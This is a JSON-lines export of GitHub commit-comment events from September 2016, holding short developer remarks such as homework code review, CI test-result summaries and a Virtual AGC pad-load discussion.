{"id":"4537219090","type":"CommitCommentEvent","actor":{"login":"f3rnando"},"repo":{"name":"f3rnando/gitguild_whitepaper_data"},"payload":{"comment":{"id":18954903,"position":null,"line":null,"path":null,"commit_id":"ce1c62a327a8c9fc92ea8fe65a574791c965395b","created_at":"2016-09-08T23:13:13Z","updated_at":"2016-09-08T23:13:13Z","body":"http://git.cypher.com.ar/cypher/tmp-f3rnando-pk/raw/master/f3rnando_pubkey.gpg\n\n:)\n\nOn Thu, Sep 8, 2016 at 7:38 PM, Ira Miller <notifications@github.com> wrote:\n\n> It is certainly my fault for not sharing a key sharing mechanism, but\n> would you please point me toward your public key? I need to verify the\n> signature is the same as the fingerprint here. 👍\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/f3rnando/gitguild_whitepaper_data/commit/ce1c62a327a8c9fc92ea8fe65a574791c965395b#commitcomment-18954382>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AARwIvJg9PwBePUwJ4T3he9Pl5tKtjUvks5qoI54gaJpZM4J4hrB>\n> .\n>\n"}},"created_at":"2016-09-08T23:13:13Z"}
{"id":"4537219148","type":"CommitCommentEvent","actor":{"login":"newluck77"},"repo":{"name":"newluck77/fprsmap"},"payload":{"comment":{"id":18954904,"position":null,"line":null,"path":null,"commit_id":"15436423617f4431422b7a0760463d06a1159501","created_at":"2016-09-08T23:13:14Z","updated_at":"2016-09-08T23:13:14Z","body":"Close #5 "}},"created_at":"2016-09-08T23:13:14Z"}
{"id":"4537221591","type":"CommitCommentEvent","actor":{"login":"barryross"},"repo":{"name":"qtngo/homework_portfolio"},"payload":{"comment":{"id":18954923,"position":58,"line":58,"path":"assignment5/css/style.css","commit_id":"717f44cb389f24cf28248c27077796d62fe31b3b","created_at":"2016-09-08T23:13:58Z","updated_at":"2016-09-08T23:13:58Z","body":"I totally understand your logic her, but because you are using these classes on the \"body\" element, you could actually just target the \"body\" element in this rule...or include the declarations in the body selector at the top!"}},"created_at":"2016-09-08T23:13:58Z"}
{"id":"4537221788","type":"CommitCommentEvent","actor":{"login":"CPSC310Bot"},"repo":{"name":"CS310-2016Fall/cpsc310project"},"payload":{"comment":{"id":18954925,"position":null,"line":null,"path":null,"commit_id":"278ecf9588435f21a707698d6affa72c1d402206","created_at":"2016-09-08T23:14:01Z","updated_at":"2016-09-08T23:14:01Z","body":"6 passing, 3 failing\nName of first spec to fail: Echo Service Should be able to echo "}},"created_at":"2016-09-08T23:14:01Z"}
{"id":"4537223992","type":"CommitCommentEvent","actor":{"login":"arjunguha"},"repo":{"name":"plasma-umass/Rehearsal"},"payload":{"comment":{"id":18954935,"position":null,"line":null,"path":null,"commit_id":"bb900492cd3be8a65fe62db700344eb887965188","created_at":"2016-09-08T23:14:39Z","updated_at":"2016-09-08T23:14:39Z","body":"I see what's wrong! We are using a travis container-based architecture, and sudo does not work."}},"created_at":"2016-09-08T23:14:39Z"}
{"id":"4537229078","type":"CommitCommentEvent","actor":{"login":"barryross"},"repo":{"name":"qtngo/homework_portfolio"},"payload":{"comment":{"id":18954977,"position":37,"line":37,"path":"assignment5/index.html","commit_id":"717f44cb389f24cf28248c27077796d62fe31b3b","created_at":"2016-09-08T23:16:08Z","updated_at":"2016-09-08T23:16:08Z","body":"How might you create two rows without using a `<br>` tag?"}},"created_at":"2016-09-08T23:16:08Z"}
{"id":"4537229762","type":"CommitCommentEvent","actor":{"login":"barryross"},"repo":{"name":"qtngo/homework_portfolio"},"payload":{"comment":{"id":18954984,"position":3,"line":3,"path":"assignment5/js/index.js","commit_id":"717f44cb389f24cf28248c27077796d62fe31b3b","created_at":"2016-09-08T23:16:18Z","updated_at":"2016-09-08T23:16:18Z","body":"Awesome to see so many comments!"}},"created_at":"2016-09-08T23:16:18Z"}
{"id":"4537230243","type":"CommitCommentEvent","actor":{"login":"barryross"},"repo":{"name":"qtngo/homework_portfolio"},"payload":{"comment":{"id":18954986,"position":40,"line":40,"path":"assignment5/js/index.js","commit_id":"717f44cb389f24cf28248c27077796d62fe31b3b","created_at":"2016-09-08T23:16:26Z","updated_at":"2016-09-08T23:16:26Z","body":"Great work here 👍 "}},"created_at":"2016-09-08T23:16:26Z"}
{"id":"4537232494","type":"CommitCommentEvent","actor":{"login":"barryross"},"repo":{"name":"qtngo/homework_portfolio"},"payload":{"comment":{"id":18955005,"position":79,"line":79,"path":"assignment5/js/index.js","commit_id":"717f44cb389f24cf28248c27077796d62fe31b3b","created_at":"2016-09-08T23:17:04Z","updated_at":"2016-09-08T23:17:04Z","body":"great use of .attr() method and using console.log() for testing!"}},"created_at":"2016-09-08T23:17:04Z"}
{"id":"4537232518","type":"CommitCommentEvent","actor":{"login":"pierre"},"repo":{"name":"killbill/killbill"},"payload":{"comment":{"id":18955006,"position":null,"line":null,"path":null,"commit_id":"ede9fe8a0b538246bf064268ebd851655c3faca8","created_at":"2016-09-08T23:17:04Z","updated_at":"2016-09-08T23:17:04Z","body":"Regarding the naming, did you generate it with `date +'%Y%m%d%H%M%S'`?\r\n\r\nCurrent value would be around 20160908161426. V20165808155853 would make it in the future?"}},"created_at":"2016-09-08T23:17:04Z"}
{"id":"4537232880","type":"CommitCommentEvent","actor":{"login":"Arber007"},"repo":{"name":"PokemonGoF/PokemonGo-Bot"},"payload":{"comment":{"id":18955008,"position":9,"line":9,"path":"pokemongo_bot/event_handlers/socketio_handler.py","commit_id":"2805cb75be3d30de272095675316f1bf9138b639","created_at":"2016-09-08T23:17:10Z","updated_at":"2016-09-08T23:17:10Z","body":"1"}},"created_at":"2016-09-08T23:17:10Z"}
{"id":"4537235349","type":"CommitCommentEvent","actor":{"login":"barryross"},"repo":{"name":"qtngo/homework_portfolio"},"payload":{"comment":{"id":18955029,"position":78,"line":78,"path":"assignment5/js/index.js","commit_id":"717f44cb389f24cf28248c27077796d62fe31b3b","created_at":"2016-09-08T23:17:51Z","updated_at":"2016-09-08T23:17:51Z","body":"You can actually remove some of these \"(\" \r\n\r\nThis should work just fine:\r\n```\r\nif (city==\"Los Angeles\" || city==\"LAX\" || city==\"LA\"){\r\n```"}},"created_at":"2016-09-08T23:17:51Z"}
{"id":"4537238188","type":"CommitCommentEvent","actor":{"login":"barryross"},"repo":{"name":"qtngo/homework_portfolio"},"payload":{"comment":{"id":18955038,"position":192,"line":192,"path":"assignment5/js/index.js","commit_id":"717f44cb389f24cf28248c27077796d62fe31b3b","created_at":"2016-09-08T23:18:40Z","updated_at":"2016-09-08T23:18:40Z","body":"Just something to think about...if you were to do this again, how might you leverage $(this) to reduce the amount of code here? "}},"created_at":"2016-09-08T23:18:40Z"}
{"id":"4537238299","type":"CommitCommentEvent","actor":{"login":"ChessQuake"},"repo":{"name":"snicolet/Stockfish"},"payload":{"comment":{"id":18955039,"position":null,"line":null,"path":null,"commit_id":"849f8e9af375a7548f50695ef634ff49c5219293","created_at":"2016-09-08T23:18:42Z","updated_at":"2016-09-08T23:18:42Z","body":"Congratulations !"}},"created_at":"2016-09-08T23:18:42Z"}
{"id":"4537239763","type":"CommitCommentEvent","actor":{"login":"blueyed"},"repo":{"name":"Shougo/deoplete.nvim"},"payload":{"comment":{"id":18955042,"position":29,"line":29,"path":"autoload/health/deoplete.vim","commit_id":"3098734e8404aed231f45612ead404790621faf1","created_at":"2016-09-08T23:19:08Z","updated_at":"2016-09-08T23:19:08Z","body":"@tjdevries \r\nHmm, that sounds like it should be in the general health report, since it is specific to all Python plugins?!"}},"created_at":"2016-09-08T23:19:08Z"}
{"id":"4537240417","type":"CommitCommentEvent","actor":{"login":"barryross"},"repo":{"name":"qtngo/homework_portfolio"},"payload":{"comment":{"id":18955045,"position":204,"line":204,"path":"assignment5/js/index.js","commit_id":"717f44cb389f24cf28248c27077796d62fe31b3b","created_at":"2016-09-08T23:19:18Z","updated_at":"2016-09-08T23:19:18Z","body":"Great to see you writing so many functions....how might you be able to refactor this in the future so you wouldn't need a new function for each new city, but could still retain the same functionality?"}},"created_at":"2016-09-08T23:19:18Z"}
{"id":"4537244536","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18955059,"position":null,"line":null,"path":null,"commit_id":"60ec043fa884f3ac07005b0da8ee997babc4cb48","created_at":"2016-09-08T23:20:30Z","updated_at":"2016-09-08T23:20:30Z","body":"input_processor_refactor (pshires) - x86_64-MacOS-10.9-clang: Tests Failed (1810 of 2350 tests passed, 21 test warnings)\n\n * 504 tests had: AUD diffs.\n * 487 tests had: EIO diffs.\n * 467 tests had: Table big diffs.\n * 209 tests had: RDD diffs.\n * 143 tests had: ERR diffs.\n * 364 tests had: MTD diffs.\n * 268 tests had: DXF diffs.\n * 1 test had: S...\n * 385 tests had: SHD diffs.\n * 403 tests had: BND diffs.\n * 292 tests had: MDD diffs.\n * 184 tests had: SSZ big diffs.\n * 14 tests had: ESO big diffs.\n * 9 tests had: MTR big diffs.\n * 9 tests had: ZSZ small diffs.\n * 28 tests had: ESO small diffs.\n * 22 tests had: MTR small diffs.\n * 3 tests had: delightin diffs.\n * 3 tests had: delightout diffs.\n * 1 test had: M...\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-60ec043fa884f3ac07005b0da8ee997babc4cb48-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-60ec043fa884f3ac07005b0da8ee997babc4cb48-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-77.02%25-red.svg)</a> \n"}},"created_at":"2016-09-08T23:20:30Z"}
{"id":"4537245962","type":"CommitCommentEvent","actor":{"login":"ApacheThunder"},"repo":{"name":"DanTheMan827/NTR_Forwarder"},"payload":{"comment":{"id":18955063,"position":null,"line":null,"path":null,"commit_id":"b54bc95208e439f66f1585b2b6cda9a92669bdf1","created_at":"2016-09-08T23:20:54Z","updated_at":"2016-09-08T23:20:54Z","body":"Take a look at a my latest commit. I removed the zero SCFG_EXT check in the while loop in main.cpp of arm9. That might have been what caused it to shut down prematurely when you were trying to use dldi init stuff without the patch enabled. (also check that the switch into NTR mode isn't happening too soon as that's my only guess on why that would be triggered in the first place)"}},"created_at":"2016-09-08T23:20:54Z"}
{"id":"4537249707","type":"CommitCommentEvent","actor":{"login":"alexpirine"},"repo":{"name":"alexpirine/jinja2-django-tags"},"payload":{"comment":{"id":18955073,"position":null,"line":null,"path":null,"commit_id":"fd34d10105fcb95f37892c31080da02fcc00e21c","created_at":"2016-09-08T23:22:01Z","updated_at":"2016-09-08T23:22:01Z","body":"The main issue was with wrongly constructed `kwargs`:\r\n\r\n```\r\n[\r\n    Keyword(\r\n        key='trans_vars',\r\n        value=Dict(\r\n            items=[\r\n                Pair(key=Const(value='candy_num'), value=Const(value=4)),\r\n                Pair(key=Const(value='candy_num'), value=Name(name='candy_num', ctx='load'))\r\n            ])\r\n    ),\r\n    Keyword(key='count_var', value=Const(value='candy_num'))\r\n]\r\n```\r\n\r\nNotice how `trans_vars` has two values, the last one coming from `additional_vars` and resulting in the UndefinedError. This was fixed by adding the counter name to `with_vars`.\r\n\r\n`int(trans_vars[count_var])` was necessary because `trans_vars[count_var]` is SafeText, thus resulting in the `TypeError: unorderable types: SafeText() > int()` error in the gettext module.\r\n\r\n"}},"created_at":"2016-09-08T23:22:01Z"}
{"id":"4537250558","type":"CommitCommentEvent","actor":{"login":"mxshrestha"},"repo":{"name":"aheckmann/gm"},"payload":{"comment":{"id":18955077,"position":126,"line":69,"path":"README.md","commit_id":"043dc03f1f68723490486c77286edfeb7689a826","created_at":"2016-09-08T23:22:18Z","updated_at":"2016-09-08T23:22:18Z","body":"is stdout a ReadableStream? I checked, the type and it displays as Socket and does not work when you try to pass it to gm as readable stream. Is this a bug?\r\nI'm trying to get a readable stream from coalesce() and then pass it to resize()."}},"created_at":"2016-09-08T23:22:18Z"}
{"id":"4537251213","type":"CommitCommentEvent","actor":{"login":"asjl"},"repo":{"name":"slow-session/wellingtonsession.org"},"payload":{"comment":{"id":18955080,"position":null,"line":null,"path":null,"commit_id":"76fad2b42577b02f5957b55f23d0351a754ea101","created_at":"2016-09-08T23:22:31Z","updated_at":"2016-09-08T23:22:31Z","body":"'let' works in Chrome but maybe not Safari?\r\n"}},"created_at":"2016-09-08T23:22:31Z"}
{"id":"4537260600","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18955108,"position":null,"line":null,"path":null,"commit_id":"2ffeccae84191b47fe7cc376502d6d02fa4e9708","created_at":"2016-09-08T23:25:07Z","updated_at":"2016-09-08T23:25:07Z","body":"ASIHPValidation (shenb) - i386-Windows-7-VisualStudio-12: OK (2330 of 2332 tests passed, 24 test warnings)\n\n * 5 tests had: EIO diffs.\n * 2 tests had: ESO big diffs.\n * 2 tests had: MTR big diffs.\n * 2 tests had: Table big diffs.\n * 25 tests had: AUD diffs.\n * 25 tests had: RDD diffs.\n * 15 tests had: ESO small diffs.\n * 13 tests had: MTR small diffs.\n * 1 test had: ERR diffs.\n * 1 test had: MTD diffs.\n * 1 test had: Table small diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-2ffeccae84191b47fe7cc376502d6d02fa4e9708-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-2ffeccae84191b47fe7cc376502d6d02fa4e9708-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.91%25-yellow.svg)</a> \n"}},"created_at":"2016-09-08T23:25:07Z"}
{"id":"4537262915","type":"CommitCommentEvent","actor":{"login":"indy91"},"repo":{"name":"rburkey2005/virtualagc"},"payload":{"comment":{"id":18955115,"position":null,"line":null,"path":null,"commit_id":"aeafd6d522082041d34a2ef213d705f4c1d72c03","created_at":"2016-09-08T23:25:41Z","updated_at":"2016-09-08T23:25:41Z","body":"Speaking about pad loads, can we contribute anything to Virtual AGC that we worked out for NASSP? There weren't any CM AGC pad load documents available, so we had to do it ourselves with the help of various sources and the AGC source code. By now that work is mostly complete, for all three CM AGC versions. Currently our scenarios for Apollo 7-11, 14-15 all have a working pad load.\r\n\r\nAnd other than pad loads, we could also provide core dumps of the erasable memory at relevant times, e.g. before a rendezvous computation or showcasing that the P63 ignition algorithm of the LGC is working. Would any of that be useful for vAGC?"}},"created_at":"2016-09-08T23:25:41Z"}
{"id":"4537262950","type":"CommitCommentEvent","actor":{"login":"ferventcoder"},"repo":{"name":"ferventcoder/checksum"},"payload":{"comment":{"id":18955116,"position":null,"line":null,"path":null,"commit_id":"4aa9306274a8c8516deb643abef9b661a09ab5b9","created_at":"2016-09-08T23:25:42Z","updated_at":"2016-09-08T23:25:42Z","body":"#4"}},"created_at":"2016-09-08T23:25:42Z"}
{"id":"4537264344","type":"CommitCommentEvent","actor":{"login":"ferventcoder"},"repo":{"name":"ferventcoder/checksum"},"payload":{"comment":{"id":18955117,"position":null,"line":null,"path":null,"commit_id":"c212eb102179a512087ccf371c505ac8e1b9632a","created_at":"2016-09-08T23:26:05Z","updated_at":"2016-09-08T23:26:05Z","body":"#1 "}},"created_at":"2016-09-08T23:26:05Z"}
{"id":"4537268465","type":"CommitCommentEvent","actor":{"login":"dnk777"},"repo":{"name":"dnk777/qfusion"},"payload":{"comment":{"id":18955133,"position":null,"line":null,"path":null,"commit_id":"5451aef4f1f5d2d81356944d204aa821853fd750","created_at":"2016-09-08T23:27:15Z","updated_at":"2016-09-08T23:27:15Z","body":"Bomb/flag carriers should not be distracted by offensive tactical spot temporary goals."}},"created_at":"2016-09-08T23:27:15Z"}
{"id":"4537271189","type":"CommitCommentEvent","actor":{"login":"gregcotten"},"repo":{"name":"videovillage/lattice.videovillage.co"},"payload":{"comment":{"id":18955138,"position":null,"line":null,"path":null,"commit_id":"0fee7c90b0a5f1f0dd6e6a80c2833abfc63e243a","created_at":"2016-09-08T23:28:05Z","updated_at":"2016-09-08T23:28:05Z","body":"Why did you do this. Couldn't you have reverted, travis-ified it, then reset hard head?"}},"created_at":"2016-09-08T23:28:05Z"}
{"id":"4537271445","type":"CommitCommentEvent","actor":{"login":"cht8687"},"repo":{"name":"nosir/JS-Concepts-Gotcha"},"payload":{"comment":{"id":18955140,"position":1,"line":1,"path":"convert.js","commit_id":"ea5473bc306514a55cd70f054999561fb173f296","created_at":"2016-09-08T23:28:10Z","updated_at":"2016-09-08T23:28:10Z","body":"lol! Nice one!"}},"created_at":"2016-09-08T23:28:10Z"}
{"id":"4537272321","type":"CommitCommentEvent","actor":{"login":"dnk777"},"repo":{"name":"dnk777/qfusion"},"payload":{"comment":{"id":18955143,"position":null,"line":null,"path":null,"commit_id":"4edaf1350b1c0e97176f1f60ad4a419788e7ec36","created_at":"2016-09-08T23:28:24Z","updated_at":"2016-09-08T23:28:24Z","body":"The old version worked but why no."}},"created_at":"2016-09-08T23:28:24Z"}
{"id":"4537277860","type":"CommitCommentEvent","actor":{"login":"leif81"},"repo":{"name":"leif81/bzkanban"},"payload":{"comment":{"id":18955170,"position":null,"line":null,"path":null,"commit_id":"ce569a2d9edbfa567079e86d8fc5e79feca46497","created_at":"2016-09-08T23:30:08Z","updated_at":"2016-09-08T23:30:08Z","body":"Cool. \r\nThis one could be DRY'd up by adding a variable for `ev.dataTransfer.getData(\"text\")` so it doesn't get written twice."}},"created_at":"2016-09-08T23:30:08Z"}
{"id":"4537281494","type":"CommitCommentEvent","actor":{"login":"dnk777"},"repo":{"name":"dnk777/qfusion"},"payload":{"comment":{"id":18955185,"position":null,"line":null,"path":null,"commit_id":"e87d9d37d9b2b58d5a03104ff8fb949eef9dbcfa","created_at":"2016-09-08T23:31:11Z","updated_at":"2016-09-08T23:31:11Z","body":"Duplicated calls did not cause any logic errors but triggered assertion. The issue was fixed for consistency."}},"created_at":"2016-09-08T23:31:11Z"}
{"id":"4537287843","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18955197,"position":null,"line":null,"path":null,"commit_id":"de88f6a99d8546ace57ef63e9538e656fcf84ab2","created_at":"2016-09-08T23:33:05Z","updated_at":"2016-09-08T23:33:05Z","body":"develop (Unknown) - x86_64-MacOS-10.10-clang: OK (2381 of 2448 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-de88f6a99d8546ace57ef63e9538e656fcf84ab2-x86_64-MacOS-10.10-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-de88f6a99d8546ace57ef63e9538e656fcf84ab2-x86_64-MacOS-10.10-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-97.26%25-yellow.svg)</a> \n"}},"created_at":"2016-09-08T23:33:05Z"}
{"id":"4537288307","type":"CommitCommentEvent","actor":{"login":"QingpingMeng"},"repo":{"name":"QingpingMeng/eventspool"},"payload":{"comment":{"id":18955201,"position":null,"line":null,"path":null,"commit_id":"bf9c17beeec0e54847b4de155a2c7de785095bef","created_at":"2016-09-08T23:33:13Z","updated_at":"2016-09-08T23:33:13Z","body":"Good job!"}},"created_at":"2016-09-08T23:33:13Z"}
{"id":"4537293652","type":"CommitCommentEvent","actor":{"login":"sbrossie"},"repo":{"name":"killbill/killbill"},"payload":{"comment":{"id":18955217,"position":null,"line":null,"path":null,"commit_id":"ede9fe8a0b538246bf064268ebd851655c3faca8","created_at":"2016-09-08T23:34:45Z","updated_at":"2016-09-08T23:34:45Z","body":"> Regarding the naming, did you generate it with date +'%Y%m%d%H%M%S'?\r\n```\r\n$ date +'%Y%M%d%H%M%S'\r\n20165808155853\r\n```\r\n"}},"created_at":"2016-09-08T23:34:45Z"}
{"id":"4537295850","type":"CommitCommentEvent","actor":{"login":"AlexIrina"},"repo":{"name":"AlexIrina/hello-world."},"payload":{"comment":{"id":18955227,"position":null,"line":null,"path":null,"commit_id":"e3c36f3774d841474e748c29bdc3c8fb7eae0d50","created_at":"2016-09-08T23:35:25Z","updated_at":"2016-09-08T23:35:25Z","body":"I'm back in business baby. Oh Yeah!!!"}},"created_at":"2016-09-08T23:35:25Z"}
{"id":"4537296773","type":"CommitCommentEvent","actor":{"login":"thsutton"},"repo":{"name":"christian-marie/git-vogue"},"payload":{"comment":{"id":18955230,"position":54,"line":157,"path":"lib/Git/Vogue/PluginCommon.hs","commit_id":"f1b98653558415c14aa2df1b15f7b8ad45b04edb","created_at":"2016-09-08T23:35:41Z","updated_at":"2016-09-08T23:35:41Z","body":"wot"}},"created_at":"2016-09-08T23:35:41Z"}
{"id":"4537301482","type":"CommitCommentEvent","actor":{"login":"noloader"},"repo":{"name":"weidai11/cryptopp"},"payload":{"comment":{"id":18955245,"position":null,"line":null,"path":null,"commit_id":"9489b14045fd9bc8817cb2ad575ec0f014e6deb2","created_at":"2016-09-08T23:37:03Z","updated_at":"2016-09-08T23:37:03Z","body":"Also see [Issue 256: error: requested alignment is less than minimum alignment of 16 for type 'unsigned __int128 [8]'](http://github.com/weidai11/cryptopp/issues/256)."}},"created_at":"2016-09-08T23:37:03Z"}
{"id":"4537303223","type":"CommitCommentEvent","actor":{"login":"ejgallego"},"repo":{"name":"coq/coq"},"payload":{"comment":{"id":18955251,"position":14,"line":172,"path":"ltac/profile_ltac.ml","commit_id":"1f358573df98358237b9af2a3ff48c99d8be0686","created_at":"2016-09-08T23:37:31Z","updated_at":"2016-09-08T23:37:31Z","body":"@JasonGross that's `Pp.v`, adds a vertical box, in the style of `Format.vbox`"}},"created_at":"2016-09-08T23:37:31Z"}
{"id":"4537306937","type":"CommitCommentEvent","actor":{"login":"magoo"},"repo":{"name":"magoo/AuthTables"},"payload":{"comment":{"id":18955263,"position":null,"line":null,"path":null,"commit_id":"c303bd815bad28bc11b63e7f414a1827af9ca624","created_at":"2016-09-08T23:38:39Z","updated_at":"2016-09-08T23:38:39Z","body":"fixes #20 "}},"created_at":"2016-09-08T23:38:39Z"}
{"id":"4537310456","type":"CommitCommentEvent","actor":{"login":"ed-asriyan"},"repo":{"name":"ed-asriyan/University"},"payload":{"comment":{"id":18955273,"position":null,"line":null,"path":null,"commit_id":"bf0e9dde403b4854ae3810d6c78d4ed92f840363","created_at":"2016-09-08T23:39:42Z","updated_at":"2016-09-08T23:39:42Z","body":"It will be soon:)"}},"created_at":"2016-09-08T23:39:42Z"}
{"id":"4537317623","type":"CommitCommentEvent","actor":{"login":"SrtaCamelo"},"repo":{"name":"SrtaCamelo/TestGit"},"payload":{"comment":{"id":18955291,"position":null,"line":null,"path":null,"commit_id":"1c101e18c7eb939d37c401cb72ddb401b126f8fc","created_at":"2016-09-08T23:41:57Z","updated_at":"2016-09-08T23:41:57Z","body":"What"}},"created_at":"2016-09-08T23:41:57Z"}
{"id":"4537323440","type":"CommitCommentEvent","actor":{"login":"rburkey2005"},"repo":{"name":"rburkey2005/virtualagc"},"payload":{"comment":{"id":18955310,"position":null,"line":null,"path":null,"commit_id":"aeafd6d522082041d34a2ef213d705f4c1d72c03","created_at":"2016-09-08T23:43:43Z","updated_at":"2016-09-08T23:43:43Z","body":"As it happens, I have just now, this evening, finished adding a \"pad \nload\" feature to the Block 1 simulator I'm working on, and was marveling \nat the fact that there's no such feature in our command-line version of \nthe Block 2 simulator ... in so far as I recall.  The format I'm using \nfor these pad-load files in Block 1 is this:\n\n  * An ASCII file called Solarium055.pad (or Artemis072.pad, or\n    Luminary131.pad, or whatever).\n  * Lines that are of the form \"octal octal\", where the first octal is\n    the address (0-01777) and the second is the value stored at the\n    address.  (Could be a full 16-bit value, with the 16th bit being\n    treated as an \"illegal\" value.)\n  * As many blank lines and comments preceded by '#' as you like.\n\nso obviously if I had some files like this, I'd add a pad-load feature \nto yaAGC.  Of course, if you want to submit something in some other \nform, we'd convert it.  Or of you have some other format that would \nfacilitate sync'ing updates to the data between us, perhaps I could \nimplement that format instead.\n\nSo, yes, certainly, as far as the pad-loads are concerned.  I don't know \nabout the core dumps; somebody else would probably have to weigh in on that.\n\nSomething that some people would find useful, if you had it, is \n\"recorded\" input data, such as landing radar.  I speak not for myself, \nbut I've been asked by people creating hardware-based sims for ready \nsources of input data, and I had none to give them.\n\n-- Ron\n\nOn 09/08/2016 06:25 PM, indy91 wrote:\n>\n> Speaking about pad loads, can we contribute anything to Virtual AGC \n> that we worked out for NASSP? There weren't any CM AGC pad load \n> documents available, so we had to do it ourselves with the help of \n> various sources and the AGC source code. By now that work is mostly \n> complete, for all three CM AGC versions. Currently our scenarios for \n> Apollo 7-11, 14-15 all have a working pad load.\n>\n> And other than pad loads, we could also provide core dumps of the \n> erasable memory at relevant times, e.g. before a rendezvous \n> computation or showcasing that the P63 ignition algorithm of the LGC \n> is working. Would any of that be useful for vAGC?\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub \n> <https://github.com/rburkey2005/virtualagc/commit/aeafd6d522082041d34a2ef213d705f4c1d72c03#commitcomment-18955115>, \n> or mute the thread \n> <https://github.com/notifications/unsubscribe-auth/ALSveIy9uji0u7P18gy14ZpKoqEKSyAgks5qoJl3gaJpZM4J4jch>.\n>\n\n"}},"created_at":"2016-09-08T23:43:43Z"}
{"id":"4537326799","type":"CommitCommentEvent","actor":{"login":"ncs-alane"},"repo":{"name":"newcontext/kitchen-terraform"},"payload":{"comment":{"id":18955319,"position":4,"line":31,"path":"lib/terraform/command_switches.rb","commit_id":"66e647e7603fdd5ef575475acd1c905c64362069","created_at":"2016-09-08T23:44:46Z","updated_at":"2016-09-08T23:44:46Z","body":"This needs to be done in the child classes rather than here. "}},"created_at":"2016-09-08T23:44:46Z"}
{"id":"4537335206","type":"CommitCommentEvent","actor":{"login":"RenatoJardimParducci"},"repo":{"name":"RenatoJardimParducci/Teste3SIR"},"payload":{"comment":{"id":18955342,"position":null,"line":null,"path":null,"commit_id":"9888a38af68fc58b1cb8e17125948ac2c148f92f","created_at":"2016-09-08T23:47:24Z","updated_at":"2016-09-08T23:47:24Z","body":"Modifica solicitada pelo gerenet"}},"created_at":"2016-09-08T23:47:24Z"}
{"id":"4537335524","type":"CommitCommentEvent","actor":{"login":"romulosamorim"},"repo":{"name":"romulosamorim/Teste3SIR"},"payload":{"comment":{"id":18955343,"position":null,"line":null,"path":null,"commit_id":"707027bd76ff5921dbd492c7af9c59433c73067b","created_at":"2016-09-08T23:47:31Z","updated_at":"2016-09-08T23:47:31Z","body":"modification requested by the manager"}},"created_at":"2016-09-08T23:47:31Z"}
{"id":"4537336503","type":"CommitCommentEvent","actor":{"login":"mitar"},"repo":{"name":"meteor/blaze"},"payload":{"comment":{"id":18955345,"position":4,"line":12,"path":"site/package.json","commit_id":"d36d0a612d947eb7193c9a2a57188c6fb4903135","created_at":"2016-09-08T23:47:49Z","updated_at":"2016-09-08T23:47:49Z","body":"@alexandesigner: This broke deployment. You removed this dependency."}},"created_at":"2016-09-08T23:47:49Z"}
{"id":"4537343080","type":"CommitCommentEvent","actor":{"login":"desaiuditd"},"repo":{"name":"rtCamp/rtsocial"},"payload":{"comment":{"id":18955367,"position":null,"line":null,"path":null,"commit_id":"e13b90c905e9eede92cb7a9dad352e43fa0971e5","created_at":"2016-09-08T23:49:55Z","updated_at":"2016-09-08T23:49:55Z","body":"@chandra-patel Any particular reason why this was removed ?\r\n\r\nActually, working on a side project and need this feature. If it's not in this plugin's scope then I will create an addon for my use."}},"created_at":"2016-09-08T23:49:55Z"}
{"id":"4537343538","type":"CommitCommentEvent","actor":{"login":"ohommes"},"repo":{"name":"rburkey2005/virtualagc"},"payload":{"comment":{"id":18955370,"position":null,"line":null,"path":null,"commit_id":"aeafd6d522082041d34a2ef213d705f4c1d72c03","created_at":"2016-09-08T23:50:04Z","updated_at":"2016-09-08T23:50:04Z","body":"Chiming in...\r\nIf we have the pad-loads, I will just like with the symtab file, auto detect if the file exists for a given .bin file and load it on init so no need for a parameter unless we add a parameter to allow for specifying an explicit name that does not match the basename of the .bin file."}},"created_at":"2016-09-08T23:50:04Z"}
{"id":"4537345674","type":"CommitCommentEvent","actor":{"login":"Robophil"},"repo":{"name":"Robophil/Product-Tour"},"payload":{"comment":{"id":18955375,"position":null,"line":null,"path":null,"commit_id":"126d082109c758f65a50916701e5b456e11dd9ae","created_at":"2016-09-08T23:50:44Z","updated_at":"2016-09-08T23:50:44Z","body":"Fixed #2 "}},"created_at":"2016-09-08T23:50:44Z"}
